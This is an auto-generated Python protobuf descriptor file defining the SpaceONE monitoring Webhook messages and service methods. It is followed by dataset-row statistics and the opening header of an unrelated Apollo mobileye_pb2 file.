serialized_start=467,
serialized_end=649,
)
_UPDATEWEBHOOKREQUEST = _descriptor.Descriptor(
name='UpdateWebhookRequest',
full_name='spaceone.api.monitoring.v1.UpdateWebhookRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='webhook_id', full_name='spaceone.api.monitoring.v1.UpdateWebhookRequest.webhook_id', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='name', full_name='spaceone.api.monitoring.v1.UpdateWebhookRequest.name', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='tags', full_name='spaceone.api.monitoring.v1.UpdateWebhookRequest.tags', index=2,
number=3, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='domain_id', full_name='spaceone.api.monitoring.v1.UpdateWebhookRequest.domain_id', index=3,
number=11, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=651,
serialized_end=765,
)
_UPDATEWEBHOOKPLUGINREQUEST = _descriptor.Descriptor(
name='UpdateWebhookPluginRequest',
full_name='spaceone.api.monitoring.v1.UpdateWebhookPluginRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='webhook_id', full_name='spaceone.api.monitoring.v1.UpdateWebhookPluginRequest.webhook_id', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='version', full_name='spaceone.api.monitoring.v1.UpdateWebhookPluginRequest.version', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='options', full_name='spaceone.api.monitoring.v1.UpdateWebhookPluginRequest.options', index=2,
number=3, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='upgrade_mode', full_name='spaceone.api.monitoring.v1.UpdateWebhookPluginRequest.upgrade_mode', index=3,
number=4, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='domain_id', full_name='spaceone.api.monitoring.v1.UpdateWebhookPluginRequest.domain_id', index=4,
number=11, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
_UPDATEWEBHOOKPLUGINREQUEST_UPGRADEMODE,
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=768,
serialized_end=1031,
)
_WEBHOOKREQUEST = _descriptor.Descriptor(
name='WebhookRequest',
full_name='spaceone.api.monitoring.v1.WebhookRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='webhook_id', full_name='spaceone.api.monitoring.v1.WebhookRequest.webhook_id', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='domain_id', full_name='spaceone.api.monitoring.v1.WebhookRequest.domain_id', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1033,
serialized_end=1088,
)
_GETWEBHOOKREQUEST = _descriptor.Descriptor(
name='GetWebhookRequest',
full_name='spaceone.api.monitoring.v1.GetWebhookRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='webhook_id', full_name='spaceone.api.monitoring.v1.GetWebhookRequest.webhook_id', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='domain_id', full_name='spaceone.api.monitoring.v1.GetWebhookRequest.domain_id', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='only', full_name='spaceone.api.monitoring.v1.GetWebhookRequest.only', index=2,
number=3, type=9, cpp_type=9, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1090,
serialized_end=1162,
)
_WEBHOOKQUERY = _descriptor.Descriptor(
name='WebhookQuery',
full_name='spaceone.api.monitoring.v1.WebhookQuery',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='query', full_name='spaceone.api.monitoring.v1.WebhookQuery.query', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='webhook_id', full_name='spaceone.api.monitoring.v1.WebhookQuery.webhook_id', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='name', full_name='spaceone.api.monitoring.v1.WebhookQuery.name', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='state', full_name='spaceone.api.monitoring.v1.WebhookQuery.state', index=3,
number=4, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='access_key', full_name='spaceone.api.monitoring.v1.WebhookQuery.access_key', index=4,
number=5, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='webhook_url', full_name='spaceone.api.monitoring.v1.WebhookQuery.webhook_url', index=5,
number=6, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='project_id', full_name='spaceone.api.monitoring.v1.WebhookQuery.project_id', index=6,
number=7, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='domain_id', full_name='spaceone.api.monitoring.v1.WebhookQuery.domain_id', index=7,
number=11, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
_WEBHOOKQUERY_WEBHOOKSTATE,
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1165,
serialized_end=1460,
)
_WEBHOOKINFO = _descriptor.Descriptor(
name='WebhookInfo',
full_name='spaceone.api.monitoring.v1.WebhookInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='webhook_id', full_name='spaceone.api.monitoring.v1.WebhookInfo.webhook_id', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='name', full_name='spaceone.api.monitoring.v1.WebhookInfo.name', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='state', full_name='spaceone.api.monitoring.v1.WebhookInfo.state', index=2,
number=3, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='access_key', full_name='spaceone.api.monitoring.v1.WebhookInfo.access_key', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='webhook_url', full_name='spaceone.api.monitoring.v1.WebhookInfo.webhook_url', index=4,
number=5, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='capability', full_name='spaceone.api.monitoring.v1.WebhookInfo.capability', index=5,
number=6, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='plugin_info', full_name='spaceone.api.monitoring.v1.WebhookInfo.plugin_info', index=6,
number=7, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='tags', full_name='spaceone.api.monitoring.v1.WebhookInfo.tags', index=7,
number=8, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='project_id', full_name='spaceone.api.monitoring.v1.WebhookInfo.project_id', index=8,
number=11, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='domain_id', full_name='spaceone.api.monitoring.v1.WebhookInfo.domain_id', index=9,
number=12, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='created_at', full_name='spaceone.api.monitoring.v1.WebhookInfo.created_at', index=10,
number=21, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
_WEBHOOKINFO_WEBHOOKSTATE,
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1463,
serialized_end=1884,
)
_WEBHOOKSINFO = _descriptor.Descriptor(
name='WebhooksInfo',
full_name='spaceone.api.monitoring.v1.WebhooksInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='results', full_name='spaceone.api.monitoring.v1.WebhooksInfo.results', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='total_count', full_name='spaceone.api.monitoring.v1.WebhooksInfo.total_count', index=1,
number=2, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1886,
serialized_end=1979,
)
_WEBHOOKSTATQUERY = _descriptor.Descriptor(
name='WebhookStatQuery',
full_name='spaceone.api.monitoring.v1.WebhookStatQuery',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='query', full_name='spaceone.api.monitoring.v1.WebhookStatQuery.query', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='domain_id', full_name='spaceone.api.monitoring.v1.WebhookStatQuery.domain_id', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1981,
serialized_end=2072,
)
_WEBHOOKPLUGININFO.fields_by_name['options'].message_type = google_dot_protobuf_dot_struct__pb2._STRUCT
_WEBHOOKPLUGININFO.fields_by_name['metadata'].message_type = google_dot_protobuf_dot_struct__pb2._STRUCT
_WEBHOOKPLUGININFO.fields_by_name['upgrade_mode'].enum_type = _WEBHOOKPLUGININFO_UPGRADEMODE
_WEBHOOKPLUGININFO_UPGRADEMODE.containing_type = _WEBHOOKPLUGININFO
_CREATEWEBHOOKREQUEST.fields_by_name['plugin_info'].message_type = _WEBHOOKPLUGININFO
_CREATEWEBHOOKREQUEST.fields_by_name['tags'].message_type = google_dot_protobuf_dot_struct__pb2._STRUCT
_UPDATEWEBHOOKREQUEST.fields_by_name['tags'].message_type = google_dot_protobuf_dot_struct__pb2._STRUCT
_UPDATEWEBHOOKPLUGINREQUEST.fields_by_name['options'].message_type = google_dot_protobuf_dot_struct__pb2._STRUCT
_UPDATEWEBHOOKPLUGINREQUEST.fields_by_name['upgrade_mode'].enum_type = _UPDATEWEBHOOKPLUGINREQUEST_UPGRADEMODE
_UPDATEWEBHOOKPLUGINREQUEST_UPGRADEMODE.containing_type = _UPDATEWEBHOOKPLUGINREQUEST
_WEBHOOKQUERY.fields_by_name['query'].message_type = spaceone_dot_api_dot_core_dot_v1_dot_query__pb2._QUERY
_WEBHOOKQUERY.fields_by_name['state'].enum_type = _WEBHOOKQUERY_WEBHOOKSTATE
_WEBHOOKQUERY_WEBHOOKSTATE.containing_type = _WEBHOOKQUERY
_WEBHOOKINFO.fields_by_name['state'].enum_type = _WEBHOOKINFO_WEBHOOKSTATE
_WEBHOOKINFO.fields_by_name['capability'].message_type = google_dot_protobuf_dot_struct__pb2._STRUCT
_WEBHOOKINFO.fields_by_name['plugin_info'].message_type = _WEBHOOKPLUGININFO
_WEBHOOKINFO.fields_by_name['tags'].message_type = google_dot_protobuf_dot_struct__pb2._STRUCT
_WEBHOOKINFO_WEBHOOKSTATE.containing_type = _WEBHOOKINFO
_WEBHOOKSINFO.fields_by_name['results'].message_type = _WEBHOOKINFO
_WEBHOOKSTATQUERY.fields_by_name['query'].message_type = spaceone_dot_api_dot_core_dot_v1_dot_query__pb2._STATISTICSQUERY
DESCRIPTOR.message_types_by_name['WebhookPluginInfo'] = _WEBHOOKPLUGININFO
DESCRIPTOR.message_types_by_name['CreateWebhookRequest'] = _CREATEWEBHOOKREQUEST
DESCRIPTOR.message_types_by_name['UpdateWebhookRequest'] = _UPDATEWEBHOOKREQUEST
DESCRIPTOR.message_types_by_name['UpdateWebhookPluginRequest'] = _UPDATEWEBHOOKPLUGINREQUEST
DESCRIPTOR.message_types_by_name['WebhookRequest'] = _WEBHOOKREQUEST
DESCRIPTOR.message_types_by_name['GetWebhookRequest'] = _GETWEBHOOKREQUEST
DESCRIPTOR.message_types_by_name['WebhookQuery'] = _WEBHOOKQUERY
DESCRIPTOR.message_types_by_name['WebhookInfo'] = _WEBHOOKINFO
DESCRIPTOR.message_types_by_name['WebhooksInfo'] = _WEBHOOKSINFO
DESCRIPTOR.message_types_by_name['WebhookStatQuery'] = _WEBHOOKSTATQUERY
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
WebhookPluginInfo = _reflection.GeneratedProtocolMessageType('WebhookPluginInfo', (_message.Message,), {
'DESCRIPTOR' : _WEBHOOKPLUGININFO,
'__module__' : 'spaceone.api.monitoring.v1.webhook_pb2'
# @@protoc_insertion_point(class_scope:spaceone.api.monitoring.v1.WebhookPluginInfo)
})
_sym_db.RegisterMessage(WebhookPluginInfo)
CreateWebhookRequest = _reflection.GeneratedProtocolMessageType('CreateWebhookRequest', (_message.Message,), {
'DESCRIPTOR' : _CREATEWEBHOOKREQUEST,
'__module__' : 'spaceone.api.monitoring.v1.webhook_pb2'
# @@protoc_insertion_point(class_scope:spaceone.api.monitoring.v1.CreateWebhookRequest)
})
_sym_db.RegisterMessage(CreateWebhookRequest)
UpdateWebhookRequest = _reflection.GeneratedProtocolMessageType('UpdateWebhookRequest', (_message.Message,), {
'DESCRIPTOR' : _UPDATEWEBHOOKREQUEST,
'__module__' : 'spaceone.api.monitoring.v1.webhook_pb2'
# @@protoc_insertion_point(class_scope:spaceone.api.monitoring.v1.UpdateWebhookRequest)
})
_sym_db.RegisterMessage(UpdateWebhookRequest)
UpdateWebhookPluginRequest = _reflection.GeneratedProtocolMessageType('UpdateWebhookPluginRequest', (_message.Message,), {
'DESCRIPTOR' : _UPDATEWEBHOOKPLUGINREQUEST,
'__module__' : 'spaceone.api.monitoring.v1.webhook_pb2'
# @@protoc_insertion_point(class_scope:spaceone.api.monitoring.v1.UpdateWebhookPluginRequest)
})
_sym_db.RegisterMessage(UpdateWebhookPluginRequest)
WebhookRequest = _reflection.GeneratedProtocolMessageType('WebhookRequest', (_message.Message,), {
'DESCRIPTOR' : _WEBHOOKREQUEST,
'__module__' : 'spaceone.api.monitoring.v1.webhook_pb2'
# @@protoc_insertion_point(class_scope:spaceone.api.monitoring.v1.WebhookRequest)
})
_sym_db.RegisterMessage(WebhookRequest)
GetWebhookRequest = _reflection.GeneratedProtocolMessageType('GetWebhookRequest', (_message.Message,), {
'DESCRIPTOR' : _GETWEBHOOKREQUEST,
'__module__' : 'spaceone.api.monitoring.v1.webhook_pb2'
# @@protoc_insertion_point(class_scope:spaceone.api.monitoring.v1.GetWebhookRequest)
})
_sym_db.RegisterMessage(GetWebhookRequest)
WebhookQuery = _reflection.GeneratedProtocolMessageType('WebhookQuery', (_message.Message,), {
'DESCRIPTOR' : _WEBHOOKQUERY,
'__module__' : 'spaceone.api.monitoring.v1.webhook_pb2'
# @@protoc_insertion_point(class_scope:spaceone.api.monitoring.v1.WebhookQuery)
})
_sym_db.RegisterMessage(WebhookQuery)
WebhookInfo = _reflection.GeneratedProtocolMessageType('WebhookInfo', (_message.Message,), {
'DESCRIPTOR' : _WEBHOOKINFO,
'__module__' : 'spaceone.api.monitoring.v1.webhook_pb2'
# @@protoc_insertion_point(class_scope:spaceone.api.monitoring.v1.WebhookInfo)
})
_sym_db.RegisterMessage(WebhookInfo)
WebhooksInfo = _reflection.GeneratedProtocolMessageType('WebhooksInfo', (_message.Message,), {
'DESCRIPTOR' : _WEBHOOKSINFO,
'__module__' : 'spaceone.api.monitoring.v1.webhook_pb2'
# @@protoc_insertion_point(class_scope:spaceone.api.monitoring.v1.WebhooksInfo)
})
_sym_db.RegisterMessage(WebhooksInfo)
WebhookStatQuery = _reflection.GeneratedProtocolMessageType('WebhookStatQuery', (_message.Message,), {
'DESCRIPTOR' : _WEBHOOKSTATQUERY,
'__module__' : 'spaceone.api.monitoring.v1.webhook_pb2'
# @@protoc_insertion_point(class_scope:spaceone.api.monitoring.v1.WebhookStatQuery)
})
_sym_db.RegisterMessage(WebhookStatQuery)
_WEBHOOK = _descriptor.ServiceDescriptor(
name='Webhook',
full_name='spaceone.api.monitoring.v1.Webhook',
file=DESCRIPTOR,
index=0,
serialized_options=None,
create_key=_descriptor._internal_create_key,
serialized_start=2075,
serialized_end=3529,
methods=[
_descriptor.MethodDescriptor(
name='create',
full_name='spaceone.api.monitoring.v1.Webhook.create',
index=0,
containing_service=None,
input_type=_CREATEWEBHOOKREQUEST,
output_type=_WEBHOOKINFO,
serialized_options=b'\202\323\344\223\002\031\"\027/monitoring/v1/webhooks',
create_key=_descriptor._internal_create_key,
),
_descriptor.MethodDescriptor(
name='update',
full_name='spaceone.api.monitoring.v1.Webhook.update',
index=1,
containing_service=None,
input_type=_UPDATEWEBHOOKREQUEST,
output_type=_WEBHOOKINFO,
serialized_options=b'\202\323\344\223\002%\032#/monitoring/v1/webhook/{webhook_id}',
create_key=_descriptor._internal_create_key,
),
_descriptor.MethodDescriptor(
name='update_plugin',
full_name='spaceone.api.monitoring.v1.Webhook.update_plugin',
index=2,
containing_service=None,
input_type=_UPDATEWEBHOOKPLUGINREQUEST,
output_type=_WEBHOOKINFO,
serialized_options=b'\202\323\344\223\002,\032*/monitoring/v1/webhook/{webhook_id}/plugin',
create_key=_descriptor._internal_create_key,
),
_descriptor.MethodDescriptor(
name='verify_plugin',
full_name='spaceone.api.monitoring.v1.Webhook.verify_plugin',
index=3,
containing_service=None,
input_type=_UPDATEWEBHOOKPLUGINREQUEST,
output_type=google_dot_protobuf_dot_empty__pb2._EMPTY,
serialized_options=b'\202\323\344\223\0023\"1/monitoring/v1/webhook/{webhook_id}/plugin/verify',
create_key=_descriptor._internal_create_key,
),
_descriptor.MethodDescriptor(
name='enable',
full_name='spaceone.api.monitoring.v1.Webhook.enable',
index=4,
containing_service=None,
input_type=_WEBHOOKREQUEST,
output_type=_WEBHOOKINFO,
serialized_options=b'\202\323\344\223\002,\032*/monitoring/v1/webhook/{webhook_id}/enable',
create_key=_descriptor._internal_create_key,
),
_descriptor.MethodDescriptor(
name='disable',
full_name='spaceone.api.monitoring.v1.Webhook.disable',
index=5,
containing_service=None,
input_type=_WEBHOOKREQUEST,
output_type=_WEBHOOKINFO,
serialized_options=b'\202\323\344\223\002-\032+/monitoring/v1/webhook/{webhook_id}/disable',
create_key=_descriptor._internal_create_key,
),
_descriptor.MethodDescriptor(
name='delete',
full_name='spaceone.api.monitoring.v1.Webhook.delete',
index=6,
containing_service=None,
input_type=_WEBHOOKREQUEST,
output_type=google_dot_protobuf_dot_empty__pb2._EMPTY,
serialized_options=b'\202\323\344\223\002%*#/monitoring/v1/webhook/{webhook_id}',
create_key=_descriptor._internal_create_key,
),
_descriptor.MethodDescriptor(
name='get',
full_name='spaceone.api.monitoring.v1.Webhook.get',
index=7,
containing_service=None,
input_type=_GETWEBHOOKREQUEST,
output_type=_WEBHOOKINFO,
serialized_options=b'\202\323\344\223\002%\022#/monitoring/v1/webhook/{webhook_id}',
create_key=_descriptor._internal_create_key,
),
_descriptor.MethodDescriptor(
name='list',
full_name='spaceone.api.monitoring.v1.Webhook.list',
index=8,
containing_service=None,
input_type=_WEBHOOKQUERY,
output_type=_WEBHOOKSINFO,
serialized_options=b'\202\323\344\223\002;\022\027/monitoring/v1/webhooksZ \"\036/monitoring/v1/webhooks/search',
create_key=_descriptor._internal_create_key,
),
_descriptor.MethodDescriptor(
name='stat',
full_name='spaceone.api.monitoring.v1.Webhook.stat',
index=9,
containing_service=None,
input_type=_WEBHOOKSTATQUERY,
output_type=google_dot_protobuf_dot_struct__pb2._STRUCT,
serialized_options=b'\202\323\344\223\002\036\"\034/monitoring/v1/webhooks/stat',
create_key=_descriptor._internal_create_key,
),
])
_sym_db.RegisterServiceDescriptor(_WEBHOOK)
DESCRIPTOR.services_by_name['Webhook'] = _WEBHOOK
# @@protoc_insertion_point(module_scope)
| 48.327749
| 5,313
| 0.767036
| 5,878
| 46,153
| 5.714869
| 0.05444
| 0.045547
| 0.07862
| 0.082162
| 0.82472
| 0.788819
| 0.760538
| 0.708145
| 0.678316
| 0.661497
| 0
| 0.043577
| 0.109484
| 46,153
| 954
| 5,314
| 48.378407
| 0.773747
| 0.022924
| 0
| 0.695847
| 1
| 0.010101
| 0.237737
| 0.202507
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.008979
| 0
| 0.008979
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
06316700aa8c46181de4407c12a483cdfc146f77
| 58,095
|
py
|
Python
|
map_label_tool/py_proto/modules/drivers/proto/mobileye_pb2.py
|
freeclouds/OpenHDMap
|
b61c159fbdf4f50ae1d1650421596b28863f39be
|
[
"Apache-2.0"
] | 2
|
2019-03-04T02:11:04.000Z
|
2019-04-18T11:19:45.000Z
|
map_label_tool/py_proto/modules/drivers/proto/mobileye_pb2.py
|
freeclouds/OpenHDMap
|
b61c159fbdf4f50ae1d1650421596b28863f39be
|
[
"Apache-2.0"
] | 1
|
2019-03-15T08:37:53.000Z
|
2019-03-15T08:37:53.000Z
|
py_proto/modules/drivers/proto/mobileye_pb2.py
|
yujianyi/fusion_localization
|
c0057e29cbf690d6260f021080fd951c1a6b6baa
|
[
"Apache-2.0"
] | 1
|
2019-03-04T02:11:09.000Z
|
2019-03-04T02:11:09.000Z
|
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: modules/drivers/proto/mobileye.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from modules.common.proto import header_pb2 as modules_dot_common_dot_proto_dot_header__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='modules/drivers/proto/mobileye.proto',
package='apollo.drivers',
syntax='proto2',
